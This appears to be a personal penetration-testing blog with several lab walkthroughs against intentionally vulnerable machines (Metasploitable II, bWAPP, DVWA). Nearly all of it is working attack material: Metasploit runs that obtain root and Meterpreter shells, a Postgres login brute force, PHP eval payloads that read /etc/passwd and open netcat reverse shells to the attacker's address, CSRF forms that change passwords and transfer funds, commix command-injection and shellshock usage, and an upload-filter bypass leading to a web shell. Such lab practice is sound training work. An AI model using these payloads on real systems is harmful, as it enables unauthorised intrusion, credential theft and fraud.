Tuesday, February 18, 2020

Metasploitable II: Unreal IRCD exploit

There exists in Metasploitable II a vulnerable IRCD server. Our goal is to exploit the vulnerablity and get local access to the remote system. Our first task is to select the module which we will use to exploit the host.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444 
[*] 192.168.56.101:6667 - Connected to 192.168.56.101:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.101:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vcxINITmV5eNOXnX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "vcxINITmV5eNOXnX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:35054) at 2020-02-18 14:02:05 -0700

id
uid=0(root) gid=0(root)
whoami
root

As you can see we got a root shell on the host and local shell access.

Saturday, February 15, 2020

Metasploitable II: POSTGRES SQL Server

In Metasploitable II there exists a postgres sql server on the system. Our goal is to exploit the remote server in two ways to gain shell access to the remote host.

We can use the postgres_login module for help us brute force a correct login for the postgres sql server.

msf5 > use auxiliary/scanner/postgres/postgres_login 
msf5 auxiliary(scanner/postgres/postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                              Required  Description
   ----              ---------------                                                              --------  -----------
   BLANK_PASSWORDS   false                                                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                            yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                    yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                        no        Add all users in the current database to the list
   PASSWORD                                                                                       no        A specific password to authenticate with
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                         no        Set to true to see query result sets
   RHOSTS                                                                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             5432                                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                                                            yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                        no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                         yes       Whether to print output for all attempts

msf5 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.56.101:5432 - Login Successful: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_login) > 

As you can see we found a correct login for the postgres sql server. Now its time to move on and try and get a system shell. For this we are going to be using the postgres_payload module of the metasploit framework.

msf5 > use exploit/linux/postgres/postgres_payload 
msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/JAkIxpbf.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:47858) at 2020-02-15 11:27:10 -0700

meterpreter > shell
Process 4825 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
python -c 'import pty;pty.spawn("/bin/bash")'
postgres@metasploitable:~/8.3/main$ pwd
pwd
/var/lib/postgresql/8.3/main
postgres@metasploitable:~/8.3/main$ 

As you can see successfully got a shell back from the payload.

Thursday, February 13, 2020

bWAPP PHP Eval Function

First we need to test the eval parameter to see if it is indeed evaluating php code.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo "TeStVUln";

Since we know we can evaluate php code we can run system commands using the shell_exec function.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("id");

We get back the id of the current user on the remote host.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("cat /etc/passwd");

Here we dumped the contents of /etc/passwd. Our next task is to get a connect back shell to our local box.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("nc -e /bin/sh 192.168.56.1 8088");

We sent the command and got a connect back.

sam@ubuntu:~/pentest$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 34263 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bee-box:/var/www/bWAPP$ id;whoami
id;whoami
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
www-data@bee-box:/var/www/bWAPP$ 

bWAPP CSRF

CSRF (Change Password)

The first challenge is the change password CSRF. Our goal is to successfully change the users password with out logging on the system.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_1.php">
<input type="hidden" name="password_new" value="abc" />
<input type="hidden" name="password_conf" value="abc" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

First we need to create a special page with all the variables needed filled in and a submit button to submit the request. All thats left to do is click the submit button and check the page status.

As you can see we successfully changed our password with the page we created and the CSRF vulnerability.

CSRF (Transfer Amount)

Next up is the transfer amount csrf. This page sends money to an account number with a total value to send. If we alter the variables in the request and push our own request to the server we should get the results we are looking for.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_2.php" method="GET">
<input type="hidden" name="account" value="123-45678-90" />
<input type="hidden" name="amount" value="100" />
<input type="hidden" name="action" value="transfer" />
<input type="submit" name="submit" value="Submit Request" />
</form>
</body>
</html>

We got the page all set up. Now all thats left to do is submit the request and hope for the best.

As you can see we submitted the request and there is now 800 euros left in the account instead of 900 like before the CSRF vulnerability.

CSRF (Change Secret)

This one is a change secret CSRF. Like before we construct a page with all our variables and a submit button

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_3.php" method="POST">
<input type="hidden" name="secret" value="1234" />
<input type="hidden" name="login" value="xyz" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

We have got our page set up. Lets submit the request and see what we get on the other end

As you can see we successfully changed the secret of the user.

Commix Injection Tool

Commix is a tool for exploiting command execution vulnerability. Today we will go through some of the options commix has and show examples of how they work.

Retrieve current user name

Our first task is to enumerate the current user name on the remote system. for that we will use the --current-user option with our url to test.

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --current-user
sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --current-user
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data.

Retrieve current hostname

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --hostname

You can retereive the hostname with commix by simply adding the --hostname option to the command line.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --hostname
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The hostname is ubuntu.

Check if the current user have root privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --is-root

To check if the current user has root privileges you can use the --is-root option

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --is-root
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data and it is not privileged.

Check if the current user have admin privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --is-admin

To check if the current user has admin privileges use the --is-admin option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --is-admin
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data and it is not privileged.

Retrieve system information

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --sys-info

To retrieve system information about the remote host use the --sys-info option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --sys-info
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The target operating system is Linux (Ubuntu 18.04) and the hardware platform is x86_64.

Retrieve system users

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --users

To get all system users on the remote system using the --users option

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --users
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[*] Fetching '/etc/passwd' to enumerate users entries... [ SUCCEED ]
[+] Identified 41 entries in '/etc/passwd'.
    (1) 'root'(uid=0). Home directory is in '/root'.
    (2) 'daemon'(uid=1). Home directory is in '/usr/sbin'.
    (3) 'bin'(uid=2). Home directory is in '/bin'.
    (4) 'sys'(uid=3). Home directory is in '/dev'.
    (5) 'sync'(uid=4). Home directory is in '/bin'.
    (6) 'games'(uid=5). Home directory is in '/usr/games'.
    (7) 'man'(uid=6). Home directory is in '/var/cache/man'.
    (8) 'lp'(uid=7). Home directory is in '/var/spool/lpd'.
    (9) 'mail'(uid=8). Home directory is in '/var/mail'.
    (10) 'news'(uid=9). Home directory is in '/var/spool/news'.
    (11) 'uucp'(uid=10). Home directory is in '/var/spool/uucp'.
    (12) 'proxy'(uid=13). Home directory is in '/bin'.
    (13) 'www-data'(uid=33). Home directory is in '/var/www'.
    (14) 'backup'(uid=34). Home directory is in '/var/backups'.
    (15) 'list'(uid=38). Home directory is in '/var/list'.
    (16) 'irc'(uid=39). Home directory is in '/var/run/ircd'.
    (17) 'gnats'(uid=41). Home directory is in '/var/lib/gnats'.
    (18) 'nobody'(uid=65534). Home directory is in '/nonexistent'.
    (19) 'systemd-network'(uid=100). Home directory is in '/run/systemd/netif'.
    (20) 'systemd-resolve'(uid=101). Home directory is in '/run/systemd/resolve'.
    (21) 'syslog'(uid=102). Home directory is in '/home/syslog'.
    (22) 'messagebus'(uid=103). Home directory is in '/nonexistent'.
    (23) '_apt'(uid=104). Home directory is in '/nonexistent'.
    (24) 'uuidd'(uid=105). Home directory is in '/run/uuidd'.
    (25) 'avahi-autoipd'(uid=106). Home directory is in '/var/lib/avahi-autoipd'.
    (26) 'usbmux'(uid=107). Home directory is in '/var/lib/usbmux'.
    (27) 'dnsmasq'(uid=108). Home directory is in '/var/lib/misc'.
    (28) 'rtkit'(uid=109). Home directory is in '/proc'.
    (29) 'lightdm'(uid=110). Home directory is in '/var/lib/lightdm'.
    (30) 'speech-dispatcher'(uid=111). Home directory is in '/var/run/speech-dispatcher'.
    (31) 'whoopsie'(uid=112). Home directory is in '/nonexistent'.
    (32) 'kernoops'(uid=113). Home directory is in '/'.
    (33) 'saned'(uid=114). Home directory is in '/var/lib/saned'.
    (34) 'pulse'(uid=115). Home directory is in '/var/run/pulse'.
    (35) 'avahi'(uid=116). Home directory is in '/var/run/avahi-daemon'.
    (36) 'colord'(uid=117). Home directory is in '/var/lib/colord'.
    (37) 'hplip'(uid=118). Home directory is in '/var/run/hplip'.
    (38) 'sam'(uid=1000). Home directory is in '/home/sam'.
    (39) 'cups-pk-helper'(uid=119). Home directory is in '/home/cups-pk-helper'.
    (40) 'mysql'(uid=120). Home directory is in '/nonexistent'.
    (41) 'postgres'(uid=121). Home directory is in '/var/lib/postgresql'.

Retrieve system users password hashes

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --passwords

To try and retrieve the password hashes for the current users on the system use the --passwords option

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --passwords
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[*] Fetching '/etc/shadow' to enumerate users password hashes... [ FAILED ]
[!] Warning: It seems that you don't have permissions to read '/etc/shadow' to enumerate users password hashes.

Retrieve system users privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --privileges

To get a list of user privileges on the system use the --privileges option

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --privileges
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ

[?] Do you want a Pseudo-Terminal shell? [Y/n] > 

Retrieve everything

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --all

For a dump of everything you would use the --all option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --all
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The hostname is ubuntu.
[+] The current user is www-data and it is not privileged.
[+] The target operating system is Linux (Ubuntu 18.04) and the hardware platform is x86_64.
[*] Fetching '/etc/passwd' to enumerate users entries... [ SUCCEED ]
[+] Identified 41 entries in '/etc/passwd'.
    (1) 'root' is root user (uid=0). Home directory is in '/root'.
    (2) 'daemon' is system user (uid=1). Home directory is in '/usr/sbin'.
    (3) 'bin' is system user (uid=2). Home directory is in '/bin'.
    (4) 'sys' is system user (uid=3). Home directory is in '/dev'.
    (5) 'sync' is system user (uid=4). Home directory is in '/bin'.
    (6) 'games' is system user (uid=5). Home directory is in '/usr/games'.
    (7) 'man' is system user (uid=6). Home directory is in '/var/cache/man'.
    (8) 'lp' is system user (uid=7). Home directory is in '/var/spool/lpd'.
    (9) 'mail' is system user (uid=8). Home directory is in '/var/mail'.
    (10) 'news' is system user (uid=9). Home directory is in '/var/spool/news'.
    (11) 'uucp' is system user (uid=10). Home directory is in '/var/spool/uucp'.
    (12) 'proxy' is system user (uid=13). Home directory is in '/bin'.
    (13) 'www-data' is system user (uid=33). Home directory is in '/var/www'.
    (14) 'backup' is system user (uid=34). Home directory is in '/var/backups'.
    (15) 'list' is system user (uid=38). Home directory is in '/var/list'.
    (16) 'irc' is system user (uid=39). Home directory is in '/var/run/ircd'.
    (17) 'gnats' is system user (uid=41). Home directory is in '/var/lib/gnats'.
    (18) 'nobody'(uid=65534). Home directory is in '/nonexistent'.
    (19) 'systemd-network' is regular user (uid=100). Home directory is in '/run/systemd/netif'.
    (20) 'systemd-resolve' is regular user (uid=101). Home directory is in '/run/systemd/resolve'.
    (21) 'syslog' is regular user (uid=102). Home directory is in '/home/syslog'.
    (22) 'messagebus' is regular user (uid=103). Home directory is in '/nonexistent'.
    (23) '_apt' is regular user (uid=104). Home directory is in '/nonexistent'.
    (24) 'uuidd' is regular user (uid=105). Home directory is in '/run/uuidd'.
    (25) 'avahi-autoipd' is regular user (uid=106). Home directory is in '/var/lib/avahi-autoipd'.
    (26) 'usbmux' is regular user (uid=107). Home directory is in '/var/lib/usbmux'.
    (27) 'dnsmasq' is regular user (uid=108). Home directory is in '/var/lib/misc'.
    (28) 'rtkit' is regular user (uid=109). Home directory is in '/proc'.
    (29) 'lightdm' is regular user (uid=110). Home directory is in '/var/lib/lightdm'.
    (30) 'speech-dispatcher' is regular user (uid=111). Home directory is in '/var/run/speech-dispatcher'.
    (31) 'whoopsie' is regular user (uid=112). Home directory is in '/nonexistent'.
    (32) 'kernoops' is regular user (uid=113). Home directory is in '/'.
    (33) 'saned' is regular user (uid=114). Home directory is in '/var/lib/saned'.
    (34) 'pulse' is regular user (uid=115). Home directory is in '/var/run/pulse'.
    (35) 'avahi' is regular user (uid=116). Home directory is in '/var/run/avahi-daemon'.
    (36) 'colord' is regular user (uid=117). Home directory is in '/var/lib/colord'.
    (37) 'hplip' is regular user (uid=118). Home directory is in '/var/run/hplip'.
    (38) 'sam' is regular user (uid=1000). Home directory is in '/home/sam'.
    (39) 'cups-pk-helper' is regular user (uid=119). Home directory is in '/home/cups-pk-helper'.
    (40) 'mysql' is regular user (uid=120). Home directory is in '/nonexistent'.
    (41) 'postgres' is regular user (uid=121). Home directory is in '/var/lib/postgresql'.
[*] Fetching '/etc/shadow' to enumerate users password hashes... [ FAILED ]

Read a file from the target host

python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-read="/etc/passwd"

To read a local file on the remote system use the --file-read option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-read="/etc/passwd"
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The contents of file '/etc/passwd': root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin 
avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin 
lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false whoopsie:x:112:119::/nonexistent:/bin/false kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin 
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin 
avahi:x:116:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash cups-pk-helper:x:119:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin mysql:x:120:128:MySQL Server,,,:/nonexistent:/bin/false postgres:x:121:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

Write to a file on the target host

python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-write="shell.php" --file-dest="/tmp/shell.php"

To write a file to the remote host use the --file-write and --file-dest options with the url.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --file-write="shell.php" --file-dest="/tmp/shell.php"
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The /tmp/shell.php file was created successfully!

Execute a single operating system command.


To execute a single command on the remote host you would use the --os-cmd option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="tail /etc/passwd"
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ

kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:114:121::/var/lib/saned:/usr/sbin/nologin pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin avahi:x:116:124:Avahi 
mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash cups-pk-helper:x:119:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin mysql:x:120:128:MySQL Server,,,:/nonexistent:/bin/false 
postgres:x:121:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

[*] Fetched data logged to text files under '/home/sam/pentest/commix/.output/127.0.0.1/logs.txt'.

Shellshock vulnerabilty exploitation.

python commix.py --url="http://192.168.56.101/bWAPP/cgi-bin/shellshock.sh" --shellshockA

We can exploit the shellshock vulnerability easy with commix and the --shellshock option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://192.168.56.101/bWAPP/cgi-bin/shellshock.sh" --shellshock
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > whoami

www-data

commix(os_shell) > 

Saturday, February 8, 2020

DVWA: File Upload

Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host.

We start off with the security being set to low so there is an unrestricted file upload vulnerability going on here

As you can see our file was uploaded successfully. Lets next move on the a medium security level and try and upload a remote shell to the host.

As you can see we had to edit the filename in the POST request to the server so that the php extension is the only extension in the filename

We got a successful upload. Now lets visit the directory where the file resides and try to run some commands with it.

All thats left to do is get a connect back shell from the remote host. We can set that up using netcat listener.

/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088
sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 54057 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
